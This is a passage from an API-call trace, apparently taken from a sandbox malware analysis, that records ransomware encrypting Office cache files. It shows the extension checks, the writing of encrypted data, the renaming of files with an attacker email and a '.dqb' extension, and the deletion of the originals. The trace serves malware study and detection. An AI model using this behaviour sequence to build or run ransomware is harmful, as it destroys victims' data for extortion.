Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0046.016] lstrlenW (lpString=".jpg") returned 4 [0046.016] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0046.016] lstrcmpiW (lpString1=".exe", lpString2=".dqb") returned 1 [0046.016] lstrlenW (lpString="ose.exe") returned 7 [0046.016] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0046.168] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=174440) returned 1 [0046.168] CloseHandle (hObject=0x21c) returned 1 [0046.168] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020 [0046.169] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.169] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0046.169] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.169] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.169] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0046.169] GetLastError () returned 0x0 [0046.169] ReadFile (in: hFile=0x21c, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x2a968, lpOverlapped=0x0) returned 1 [0046.173] WriteFile (in: hFile=0x180, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x2a970, lpOverlapped=0x0) returned 1 [0046.177] ReadFile (in: hFile=0x21c, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0046.177] WriteFile (in: hFile=0x180, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xe2, lpOverlapped=0x0) returned 1 [0046.177] SetEndOfFile (hFile=0x180) returned 1 [0046.177] CloseHandle (hObject=0x180) returned 1 [0046.177] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.177] SetEndOfFile (hFile=0x21c) returned 1 [0046.179] CloseHandle (hObject=0x21c) returned 1 [0046.179] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0046.179] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1 [0046.179] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0046.179] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0046.179] lstrlenW (lpString=".doc") returned 4 [0046.179] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0046.179] lstrlenW (lpString=".docx") returned 5 [0046.179] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0046.180] lstrlenW (lpString=".pdf") returned 4 [0046.180] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0046.180] lstrlenW (lpString=".xls") returned 4 [0046.180] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0046.180] lstrlenW (lpString=".xlsx") returned 5 [0046.180] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0046.180] lstrlenW (lpString=".ppt") returned 4 [0046.180] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0046.180] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0046.180] lstrlenW (lpString=".zip") returned 4 [0046.180] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0046.180] lstrlenW (lpString=".rar") returned 4 [0046.180] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0046.180] lstrlenW (lpString=".bz2") returned 4 [0046.180] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0046.180] lstrlenW (lpString=".7z") returned 3 [0046.180] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0046.180] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0046.180] lstrlenW (lpString=".dbf") returned 4 [0046.180] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0046.180] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0046.180] lstrlenW (lpString=".1cd") returned 4 [0046.180] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0046.180] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0046.180] lstrlenW (lpString=".jpg") returned 4 [0046.180] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0046.180] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0046.180] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0046.180] lstrlenW (lpString=".doc") returned 4 [0046.180] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0046.180] lstrlenW (lpString=".docx") returned 5 [0046.180] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0046.180] lstrlenW (lpString=".pdf") returned 4 [0046.180] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0046.180] lstrlenW (lpString=".xls") returned 4 [0046.180] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0046.180] lstrlenW (lpString=".xlsx") returned 5 [0046.181] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0046.181] lstrlenW (lpString=".ppt") returned 4 [0046.181] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0046.181] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0046.181] lstrlenW (lpString=".zip") returned 4 [0046.181] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0046.181] lstrlenW (lpString=".rar") returned 4 [0046.181] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0046.181] lstrlenW (lpString=".bz2") returned 4 [0046.181] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0046.181] lstrlenW (lpString=".7z") returned 3 [0046.181] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0046.181] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0046.181] lstrlenW (lpString=".dbf") returned 4 [0046.181] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0046.181] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0046.181] lstrlenW (lpString=".1cd") returned 4 [0046.181] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0046.181] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0046.181] lstrlenW (lpString=".jpg") returned 4 [0046.181] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0046.181] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0046.181] lstrlenW (lpString="osetup.dll") returned 10 [0046.181] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0046.182] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=7378792) returned 1 [0046.182] CloseHandle (hObject=0x21c) returned 1 [0046.182] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020 [0046.182] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.182] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0046.182] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0046.182] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0046.182] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0046.182] ReadFile (in: hFile=0x21c, lpBuffer=0x3db0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3db0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.186] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0046.186] ReadFile (in: hFile=0x21c, lpBuffer=0x3df0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3df0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.189] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0046.189] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0046.189] ReadFile (in: hFile=0x21c, lpBuffer=0x3e30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3e30058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.209] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.210] WriteFile (in: hFile=0x21c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0046.465] SetEndOfFile (hFile=0x21c) returned 1 [0046.674] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f14078 [0046.678] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0046.678] WriteFile (in: hFile=0x21c, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.679] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0046.680] WriteFile (in: hFile=0x21c, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.681] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0046.681] WriteFile (in: hFile=0x21c, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.683] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f14078 | out: hHeap=0x570000) returned 1 [0046.683] CloseHandle (hObject=0x21c) returned 1 [0046.683] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0046.683] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.684] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.684] lstrlenW (lpString=".doc") returned 4 [0046.684] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.684] lstrlenW (lpString=".docx") returned 5 [0046.684] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0046.684] lstrlenW (lpString=".pdf") returned 4 [0046.684] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.684] lstrlenW (lpString=".xls") returned 4 [0046.684] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.684] lstrlenW (lpString=".xlsx") returned 5 [0046.684] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0046.684] lstrlenW (lpString=".ppt") returned 4 [0046.684] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.684] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.684] lstrlenW (lpString=".zip") returned 4 [0046.684] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.684] lstrlenW (lpString=".rar") returned 4 [0046.684] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.684] lstrlenW (lpString=".bz2") returned 4 [0046.684] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.684] lstrlenW (lpString=".7z") returned 3 [0046.684] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.684] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.684] lstrlenW (lpString=".dbf") returned 4 [0046.684] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.684] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.684] lstrlenW (lpString=".1cd") returned 4 [0046.684] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.684] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.684] lstrlenW (lpString=".jpg") returned 4 [0046.684] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.684] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.684] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.685] lstrlenW (lpString=".doc") returned 4 [0046.685] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.685] lstrlenW (lpString=".docx") returned 5 [0046.685] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0046.685] lstrlenW (lpString=".pdf") returned 4 [0046.685] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.685] lstrlenW (lpString=".xls") returned 4 [0046.685] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.685] lstrlenW (lpString=".xlsx") returned 5 [0046.685] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0046.685] lstrlenW (lpString=".ppt") returned 4 [0046.685] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.685] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.685] lstrlenW (lpString=".zip") returned 4 [0046.685] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.685] lstrlenW (lpString=".rar") returned 4 [0046.685] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.685] lstrlenW (lpString=".bz2") returned 4 [0046.685] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.685] lstrlenW (lpString=".7z") returned 3 [0046.685] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.685] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.685] lstrlenW (lpString=".dbf") returned 4 [0046.685] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.685] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.685] lstrlenW (lpString=".1cd") returned 4 [0046.685] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.685] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.685] lstrlenW (lpString=".jpg") returned 4 [0046.685] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.685] lstrcmpiW (lpString1=".xrm-ms", lpString2=".dqb") returned 1 [0046.686] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0046.686] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0047.482] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=715834) returned 1 [0047.482] CloseHandle (hObject=0x1f8) returned 1 [0047.482] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020 [0047.483] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0047.483] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0047.483] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.483] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.483] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0047.483] GetLastError () returned 0x0 [0047.483] ReadFile (in: hFile=0x1f8, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0xaec3a, lpOverlapped=0x0) returned 1 [0048.178] WriteFile (in: hFile=0x21c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xaec40, lpOverlapped=0x0) returned 1 [0048.191] ReadFile (in: hFile=0x1f8, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0048.191] WriteFile (in: hFile=0x21c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x104, lpOverlapped=0x0) returned 1 [0048.191] SetEndOfFile (hFile=0x21c) returned 1 [0048.209] CloseHandle (hObject=0x21c) returned 1 [0048.209] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.209] SetEndOfFile (hFile=0x1f8) returned 1 [0048.575] CloseHandle (hObject=0x1f8) returned 1 [0048.575] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0048.575] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1 [0048.576] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.576] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.576] lstrlenW (lpString=".doc") returned 4 [0048.576] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0048.576] lstrlenW (lpString=".docx") returned 5 [0048.576] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0048.576] lstrlenW (lpString=".pdf") returned 4 [0048.576] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0048.576] lstrlenW (lpString=".xls") returned 4 [0048.576] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0048.576] lstrlenW (lpString=".xlsx") returned 5 [0048.576] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0048.576] lstrlenW (lpString=".ppt") returned 4 [0048.576] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0048.576] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.576] lstrlenW (lpString=".zip") returned 4 [0048.576] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0048.576] lstrlenW (lpString=".rar") returned 4 [0048.576] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0048.576] lstrlenW (lpString=".bz2") returned 4 [0048.576] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0048.576] lstrlenW (lpString=".7z") returned 3 [0048.576] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0048.576] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.576] lstrlenW (lpString=".dbf") returned 4 [0048.576] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0048.576] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.576] lstrlenW (lpString=".1cd") returned 4 [0048.576] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0048.576] lstrlenW (lpString="C:\\MSOCache\\All 